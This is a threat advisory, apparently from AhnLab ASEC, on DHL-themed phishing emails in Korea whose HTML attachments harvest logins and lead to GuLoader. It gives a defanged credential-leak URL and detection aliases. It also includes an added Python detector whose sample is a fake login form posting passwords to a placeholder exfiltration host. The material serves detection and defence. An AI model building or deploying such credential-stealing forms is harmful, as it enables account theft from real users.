ASEC (AhnLab Security Emergency response Center) has recently discovered malicious emails impersonating shipping companies being distributed in Korea. Sent with the subject ‘Submitting import clearance info’, these emails prompt users to open the attached file. Considering that the attached HTML file’s name starts with ‘DHL_Korea’, it can be concluded that the email is being distributed to Korean targets.
This disguised email carries a login page in the attached HTML file. When a user logs in on this page, an Excel file uploaded to a personal OneDrive cloud storage account is opened.
When a user opens the attached HTML, the login page it displays leaks the password they enter to the server below.
- Information leak address: hxxps://lucent-fittings.000webhostapp[.]com/action.php
After the user attempts to log in, they are redirected to an Excel file uploaded to a personal OneDrive cloud storage account. However, the Excel file at the link cannot be opened because it exceeds the file size limit. The screen that leads to the Excel file was designed to deceive users, making it difficult for them to immediately realize that they were phished after entering their account credentials.
Similar to the ‘Submitting import clearance info’ phishing email described above, another email asking users to verify their customs clearance status was found. When the attachment is opened, a screen designed to make users believe they have been connected to a PDF file is shown. The URL linked to the Open button is currently inaccessible, but it has been confirmed that the GuLoader malware was downloaded while the address was accessible.
Due to the recent distribution of phishing emails related to import clearance, users must be particularly cautious before entering their account credentials or opening attached files. Currently, V3 products detect and block the files mentioned in this post using the following aliases.
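Attachments of this kind can be screened for automatically. The following is an added example, not ASEC’s code: it parses an HTML attachment and flags any form that contains a password field and posts to a host outside an allow-list, which is the pattern of the ‘DHL_Korea’ login page above. The sample HTML and its action URL are constructed placeholders, not the indicator from this post.

```python
"""Flag HTML attachments whose login form posts credentials to an external host."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a fake sign-in page whose <form> submits to a third-party host.
# The hostname is a placeholder, not the real indicator from the post.
SAMPLE_HTML = """
<html><body>
<form method="post" action="https://example-exfil.invalid/action.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <button type="submit">Sign in</button>
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Collect every <form> action and whether that form has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "has_password": bool}
        self._current = None     # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, trusted_hosts=()):
    """Return action URLs of password forms posting to a host not in trusted_hosts.

    Relative actions (same origin as the page) yield no hostname and are not flagged."""
    parser = FormCollector()
    parser.feed(html)
    hits = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        if form["has_password"] and host and host not in trusted_hosts:
            hits.append(form["action"])
    return hits


if __name__ == "__main__":
    print(suspicious_forms(SAMPLE_HTML))
```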
- Phishing/HTML.FakeMS.S2082 (2023.01.19.00)
- Trojan/PDF.Generic (2023.02.10.02)
- Trojan/Win.GuLoader.C5379004 (2023.02.11.00)